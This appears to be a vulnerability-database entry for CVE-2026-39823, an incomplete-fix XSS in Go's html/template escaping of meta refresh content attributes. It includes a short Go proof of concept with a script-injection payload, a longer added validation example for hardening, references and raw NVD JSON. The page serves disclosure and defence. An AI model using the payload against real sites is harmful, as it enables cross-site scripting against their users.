Security Vulnerability Report
CVE-2026-39823 CVSS 6.1 MEDIUM

Published: 2026-05-07 20:16:43
Last Modified: 2026-05-08 15:16:38

Description

CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside the content attribute of a <meta> tag. That fix was incomplete: if the URL content inserted ASCII whitespace around the '=' rune inside the content attribute, the escaper (Go's html/template, per the GO-2026-4982 reference below) would fail to escape it in the same way, leading to XSS.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Golang (see the official security announcement for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
package main

import (
	"html/template"
	"log"
	"os"
)

func main() {
	// Simulate user input containing ASCII whitespace around '='.
	// This payload attempts to break out of the meta tag.
	// (Raw string literal so the embedded double quotes are legal Go.)
	maliciousInput := `0; url=http://example.com ? x = "><script>alert(1)</script>`

	// Template rendering a meta tag with dynamic content.
	tmpl := `<meta http-equiv="refresh" content="{{ . }}">`
	t := template.Must(template.New("test").Parse(tmpl))

	// Execute the template to demonstrate the vulnerability.
	// In a vulnerable version, the script tag might not be escaped properly.
	if err := t.Execute(os.Stdout, maliciousInput); err != nil {
		log.Fatal(err)
	}
}
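The following is an added hardening example written for this page; it is not code from the Go project, from the page's PoC, or from the linked fix. Rather than depending on html/template's context detection for the meta refresh content attribute, it validates the user-supplied redirect target first (the function names ValidateRedirectTarget and RenderRefresh, the disallowed character set, and the sample inputs are all assumptions of this example). The check rejects any ASCII whitespace or control character, which is exactly the class of input the description says slipped past the escaper, as well as quotes, angle brackets, ';' and ',', and then requires an absolute http(s) URL.

```go
package main

import (
	"errors"
	"fmt"
	"html/template"
	"net/url"
	"strings"
)

// Hypothetical hardening layer (not part of Go or of the page's PoC):
// validate a user-supplied redirect target before it ever reaches a
// <meta http-equiv="refresh"> content attribute, instead of relying on
// html/template's context detection for that attribute.

// refreshTmpl renders the delay and URL through html/template; the URL it
// receives has already been validated by ValidateRedirectTarget.
var refreshTmpl = template.Must(template.New("refresh").Parse(
	`<meta http-equiv="refresh" content="{{.Delay}}; url={{.URL}}">`))

// disallowed lists the characters that can change how a browser parses the
// refresh content value or the surrounding attribute: ASCII whitespace
// (the CVE-2026-39823 bypass), quotes, angle brackets, ';' and ','.
const disallowed = " \t\n\r\f\"'<>;,"

// ValidateRedirectTarget accepts only absolute http(s) URLs with a host and
// no disallowed or control characters, and returns the URL re-serialised
// by net/url. Anything else is rejected with an error.
func ValidateRedirectTarget(raw string) (string, error) {
	if raw == "" {
		return "", errors.New("empty redirect target")
	}
	for _, r := range raw {
		if r < 0x20 || r == 0x7f || strings.ContainsRune(disallowed, r) {
			return "", fmt.Errorf("redirect target contains forbidden character %q", r)
		}
	}
	u, err := url.Parse(raw)
	if err != nil {
		return "", fmt.Errorf("redirect target is not a valid URL: %w", err)
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return "", fmt.Errorf("redirect target scheme %q is not allowed", u.Scheme)
	}
	if u.Host == "" {
		return "", errors.New("redirect target must be absolute")
	}
	return u.String(), nil
}

// RenderRefresh returns the <meta> element for a validated target, or an
// error (and no markup at all) when the target is rejected.
func RenderRefresh(delay int, raw string) (string, error) {
	target, err := ValidateRedirectTarget(raw)
	if err != nil {
		return "", err
	}
	var sb strings.Builder
	err = refreshTmpl.Execute(&sb, struct {
		Delay int
		URL   string
	}{delay, target})
	if err != nil {
		return "", err
	}
	return sb.String(), nil
}

func main() {
	// Constructed sample inputs: the URL portion of the page's PoC payload,
	// a whitespace-around-'=' variant, a scheme-smuggling attempt, and a
	// benign target.
	inputs := []string{
		`http://example.com ? x = "><script>alert(1)</script>`,
		"https://example.com/?a = b",
		"javascript:alert(1)",
		"https://example.com/path?x=1",
	}
	for _, in := range inputs {
		out, err := RenderRefresh(0, in)
		if err != nil {
			fmt.Printf("rejected %q: %v\n", in, err)
			continue
		}
		fmt.Println(out)
	}
}
```

The validator refuses whitespace and quotes outright rather than trying to escape them because the browser-side refresh grammar skips ASCII whitespace and tolerates optional quotes around the URL, so a value that "looks escaped" to a template engine can still be re-tokenised by the browser. Upgrading the Go toolchain remains the actual fix; govulncheck will flag binaries built with an affected version via the GO-2026-4982 entry listed in the raw JSON below.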

References

https://go.dev/cl/769920
https://go.dev/issue/78913
https://groups.google.com/g/golang-announce/c/qcCIEXso47M
https://pkg.go.dev/vuln/GO-2026-4982

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39823", "sourceIdentifier": "[email protected]", "published": "2026-05-07T20:16:43.290", "lastModified": "2026-05-08T15:16:37.500", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2026-27142 fixed a vulnerability in which URLs were not correctly escaped inside of a <meta> tag's <content> attribute. If the URL content were to insert ASCII whitespaces around the '=' rune inside of the <content> attribute, the escaper would fail to similarly escape it, leading to XSS."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://go.dev/cl/769920", "source": "[email protected]"}, {"url": "https://go.dev/issue/78913", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2026-4982", "source": "[email protected]"}]}}